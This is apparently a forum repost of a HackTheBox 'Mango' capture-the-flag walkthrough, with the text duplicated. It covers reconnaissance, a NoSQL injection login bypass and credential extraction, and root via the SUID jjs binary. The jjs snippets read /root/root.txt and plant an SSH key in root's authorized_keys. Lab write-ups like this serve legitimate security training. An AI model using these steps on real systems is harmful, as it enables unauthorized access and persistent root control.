Peppino1707
Algorithm Architect
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Today we’re going to solve another boot2root challenge called “Mango“. It’s available at HackTheBox for penetration testing practice. This laboratory is of an easy level, but with adequate basic knowledge to break the laboratories and if we pay attention to all the details we find during the examination it will not be complicated. The credit for making this lab goes to MrR3boot. Let’s get started and learn how to break it down successfully.
Level: Medium
Since these labs are available on the HackTheBox website.
Penetration Testing Methodology
Reconnaissance
Enumeration
Exploiting
Privilege Escalation
Walkthrough
Reconnaissance
We execute nmap tool with all ports, versions and scripts.
We see web services for 443 port, this has an SSL certificate and we enumerate a subdomain.
We insert subdomain in “/etc/hosts”:
Enumeration
We access this web resource and we see that we do not have access.
We access the subdomain found, we have an authentication panel that we must violate.
We use Burp for testing the differents payloads SQL injection on the website. We found that the site is vulnerable to NoSQL Injection.
We visit the website using the payload and see that we manage to bypass the authentication system.
Exploiting
We use the following script, we get two credentials.
Download: Script NoSQL.py
We use the credentials of user “mango” with the SSH service.
We don’t access the “user.txt” file, we authentication with “admin” user and we read the “user.txt” flag.
Privilege Escalation (root)
We use the lse.sh script, we enumerate two uncommon suid binaries, we will use “jjs” for privilege escalation.
If we do not want to complicate it, we will read directly the root.txt file, but this is not valid in OSCP and besides, it loses the essence of the boot2root.
Code to read “root.txt”:
How can we escalate to root? There are several ways, I didn’t get complicated and I did it by adding my public key to the “authority_keys” file of the root user.
Once done, we read the “authorized_keys” file of the root user and check that our public key is already there.
We connect to SSH service with root user and we use RSA private key.
Author: David UtĂłn is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.
Level: Medium
Since these labs are available on the HackTheBox website.
Penetration Testing Methodology
Reconnaissance
- Nmap
Enumeration
- Burp Suite
- Lse.sh
Exploiting
- NoSQL Injection with python script
Privilege Escalation
- Abuse of SUID “jjs” binary
- Capture the flag
Walkthrough
Reconnaissance
We execute nmap tool with all ports, versions and scripts.
Code:
nmap -A -p- mango.htbWe see web services for 443 port, this has an SSL certificate and we enumerate a subdomain.
We insert subdomain in “/etc/hosts”:
Enumeration
We access this web resource and we see that we do not have access.
We access the subdomain found, we have an authentication panel that we must violate.
We use Burp for testing the differents payloads SQL injection on the website. We found that the site is vulnerable to NoSQL Injection.
We visit the website using the payload and see that we manage to bypass the authentication system.
Exploiting
We use the following script, we get two credentials.
.
Download: Script NoSQL.py
We use the credentials of user “mango” with the SSH service.
We don’t access the “user.txt” file, we authentication with “admin” user and we read the “user.txt” flag.
Privilege Escalation (root)
We use the lse.sh script, we enumerate two uncommon suid binaries, we will use “jjs” for privilege escalation.
If we do not want to complicate it, we will read directly the root.txt file, but this is not valid in OSCP and besides, it loses the essence of the boot2root.
Code to read “root.txt”:
Code:
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjsHow can we escalate to root? There are several ways, I didn’t get complicated and I did it by adding my public key to the “authority_keys” file of the root user.
Code:
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2………
fw.close();' | jjsOnce done, we read the “authorized_keys” file of the root user and check that our public key is already there.
We connect to SSH service with root user and we use RSA private key.
Author: David UtĂłn is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.